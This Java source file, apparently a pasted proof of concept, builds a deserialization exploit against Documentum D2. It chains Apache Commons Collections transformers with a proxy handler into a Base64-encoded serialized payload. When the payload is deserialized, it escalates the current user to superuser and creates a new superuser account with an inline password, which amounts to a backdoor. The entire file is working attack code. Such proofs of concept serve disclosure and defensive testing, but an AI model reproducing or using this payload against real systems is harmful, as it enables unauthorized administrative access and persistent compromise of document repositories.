import java.io.ByteArrayOutputStream;import java.io.ObjectOutputStream;import

1. import java.io.ByteArrayOutputStream;
2. import java.io.ObjectOutputStream;
3. import java.lang.reflect.Array;
4. import java.lang.reflect.Field;
5. import java.lang.reflect.InvocationHandler;
6. import java.lang.reflect.Method;
7. import java.lang.reflect.Proxy;
8. import java.util.HashMap;
9. import java.util.Map;
10.  
11. import org.apache.commons.collections.Transformer;
12. import org.apache.commons.collections.functors.ChainedTransformer;
13. import org.apache.commons.collections.functors.ConstantTransformer;
14. import org.apache.commons.collections.functors.InvokerTransformer;
15. import org.apache.commons.collections.map.LazyMap;
16.  
17. import com.documentum.fc.client.impl.typeddata.DynamicallyTypedData;
18. import com.documentum.fc.client.impl.typeddata.ITypedData;
19. import com.documentum.fc.common.DfId;
20. import com.documentum.fc.common.IDfId;
21. import com.documentum.fc.impl.RuntimeContext;
22. import com.documentum.xerces_2_8_0.xerces.impl.dv.util.Base64;
23. import com.sun.corba.se.spi.orbutil.proxy.CompositeInvocationHandlerImpl;
24.  
25. /**
26. * @author Andrey B. Panfilov <andrey@panfilov.tel>
27. */
28. public class DocumentumD2AACBackDoorPoC {
29.  
30. @SuppressWarnings("unchecked")
31. public static void main(String[] args) throws Exception {
32. if (args.length != 2) {
33. System.out.println("Usage: java " + DocumentumD2AACBackDoorPoC.class.getName() + " docbase username");
34. return;
35. }
36.  
37. String docbaseName = args[0];
38. String userName = args[1];
39.  
40. ITypedData becomeSuperUserQuery = new DynamicallyTypedData();
41. becomeSuperUserQuery.appendString("QUERY",
42. "UPDATE dm_dbo.dm_user_s SET user_privileges=16, i_vstamp=i_vstamp+1 WHERE user_name=USER");
43.  
44. ITypedData createUserQuery = new DynamicallyTypedData();
45. createUserQuery.appendString("QUERY",
46. "CREATE dm_user object SET user_name='" + userName + "', SET user_login_name='" + userName
47. + "', SET user_source='inline password', SET user_password='" + userName
48. + "', SET user_privileges=16");
49.  
50. ITypedData createRegisteredQuery = new DynamicallyTypedData();
51. createRegisteredQuery.appendBoolean("IS_NEW_OBJECT", true);
52. createRegisteredQuery.appendString("OBJECT_TYPE", "DM_REGISTERED");
53. createRegisteredQuery.appendInt("i_vstamp", 0);
54. createRegisteredQuery.appendString("table_name", "dm_user_s");
55. createRegisteredQuery.appendString("table_owner", docbaseName);
56. createRegisteredQuery.appendString("owner_name", docbaseName);
57. createRegisteredQuery.appendInt("world_permit", 7);
58. createRegisteredQuery.appendString("object_name", "dm_user_s");
59. createRegisteredQuery.appendInt("owner_table_permit", 15);
60. createRegisteredQuery.appendInt("group_table_permit", 15);
61. createRegisteredQuery.appendInt("world_table_permit", 15);
62. createRegisteredQuery.appendString("r_object_type", "dm_registered");
63.  
64. Transformer getSession = new ChainedTransformer(
65. new Transformer[] { new ConstantTransformer(RuntimeContext.class),
66. new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class },
67. new Object[] { "getInstance", new Class[0] }),
68. new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class },
69. new Object[] { null, new Object[0] }),
70. new InvokerTransformer("getSessionRegistry", new Class[0], new Object[0]),
71. new InvokerTransformer("getAllSessions", new Class[0], new Object[0]),
72. new InvokerTransformer("get", new Class[] { int.class }, new Object[] { 0 }), });
73.  
74. Transformer flushGlobalCache = new ChainedTransformer(new Transformer[] { getSession,
75. new InvokerTransformer("flushGlobalCache", new Class[] { String.class }, new Object[] { "user" }) });
76.  
77. Transformer getDocbaseAPI = new ChainedTransformer(
78. new Transformer[] { getSession, new InvokerTransformer("getDocbaseApi", new Class[0], new Object[0]) });
79.  
80. Transformer createUser = new ChainedTransformer(new Transformer[] { getDocbaseAPI,
81. new InvokerTransformer("parameterizedApply",
82. new Class[] { String.class, IDfId.class, ITypedData.class, boolean.class },
83. new Object[] { "EXEC", DfId.DF_NULLID, createUserQuery, false }),
84. new ConstantTransformer(null) });
85.  
86. Transformer becomeSuperUser = new ChainedTransformer(new Transformer[] { getDocbaseAPI,
87. new InvokerTransformer("parameterizedApply",
88. new Class[] { String.class, IDfId.class, ITypedData.class, boolean.class },
89. new Object[] { "EXEC", DfId.DF_NULLID, becomeSuperUserQuery, false }),
90. new ConstantTransformer(null) });
91.  
92. Transformer createRegistered = new ChainedTransformer(
93. new Transformer[] { getDocbaseAPI,
94. new InvokerTransformer("parameterizedApply", new Class[] { String.class, IDfId.class,
95. ITypedData.class, boolean.class },
96. new Object[] { "SysObjSave", new DfId("1900000080000001"), createRegisteredQuery, false }),
97. new ConstantTransformer(null) });
98.  
99. Map innerMap = new HashMap();
100. Map lazyMap = LazyMap.decorate(innerMap, new ChainedTransformer(
101. new Transformer[] { createRegistered, becomeSuperUser, flushGlobalCache, createUser }));
102. CompositeInvocationHandlerImpl handler = new CompositeInvocationHandlerImpl();
103. handler.setDefaultHandler(new InvocationHandler() {
104. public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
105. return method.invoke(new HashMap(), args);
106. }
107. });
108.  
109. // lazyMap.get(null);
110.  
111. Map<Object, Object> result = new HashMap<Object, Object>();
112. result.put(createProxy(handler, Map.class), null);
113. setFieldValue(handler, "classToInvocationHandler", lazyMap);
114. handler.setDefaultHandler(null);
115.  
116. ByteArrayOutputStream baos = new ByteArrayOutputStream();
117. ObjectOutputStream oos = new ObjectOutputStream(baos);
118. oos.writeObject(result);
119. oos.flush();
120. byte[] bytes = baos.toByteArray();
121. String payload = Base64.encode(bytes);
122. System.out.println(payload);
123. }
124.  
125. public static <T> T createProxy(final InvocationHandler ih, final Class<T> iface, final Class<?>... ifaces) {
126. final Class<?>[] allIfaces = (Class<?>[]) Array.newInstance(Class.class, ifaces.length + 1);
127. allIfaces[0] = iface;
128. if (ifaces.length > 0) {
129. System.arraycopy(ifaces, 0, allIfaces, 1, ifaces.length);
130. }
131. return iface.cast(Proxy.newProxyInstance(DocumentumD2AACBackDoorPoC.class.getClassLoader(), allIfaces, ih));
132. }
133.  
134. public static Field getField(final Class<?> clazz, final String fieldName) throws Exception {
135. Field field = clazz.getDeclaredField(fieldName);
136. if (field == null && clazz.getSuperclass() != null) {
137. field = getField(clazz.getSuperclass(), fieldName);
138. }
139. field.setAccessible(true);
140. return field;
141. }
142.  
143. public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
144. final Field field = getField(obj.getClass(), fieldName);
145. field.set(obj, value);
146. }
147.  
148. }